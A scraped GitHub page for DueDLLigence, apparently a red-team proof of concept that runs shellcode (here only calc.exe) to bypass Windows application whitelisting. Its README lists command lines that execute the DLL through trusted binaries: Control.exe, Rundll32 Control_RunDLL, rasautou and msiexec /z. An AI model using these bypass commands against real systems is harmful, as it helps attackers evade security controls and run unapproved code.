Skip to content
No description, website, or topics provided.
Branch: master
Clone or download
Casey Updated "last updated" timestamp
Updated to include naming credit
Latest commit 5c6158d Oct 11, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information.
DueDLLigence Updated "last updated" timestamp Oct 10, 2019
packages added packages Oct 7, 2019
.gitignore Initial Commit Oct 7, 2019
DueDLLigence.sln Initial Commit Oct 7, 2019 Updated "last updated" timestamp Oct 10, 2019


Shellcode runner for all application whitelisting bypasses. The shellcode included in this project spawns calc.exe.

If desired, change the injection type by modifying the following line to the appropriate injection type
public const ExecutionMethod method = ExecutionMethod.CreateThread;

Running the DLL with the following legitimate exes


Export: CPlApplet Syntax: Rename compiled “dll” extension to “cpl” and just double click it!
Control.exe [cplfile]
Rundll32.exe Shell32.dll, Control_RunDLL [cplfile]


Export: powershell
rasautou –d {dllpayload} –p powershell –a a –e e


Export: DllUnregisterServer
msiexec /z {full path to msiexec.dll}

Credit for the DueDLLigence name goes to Paul Sanders (@saul_panders)

You can’t perform that action at this time.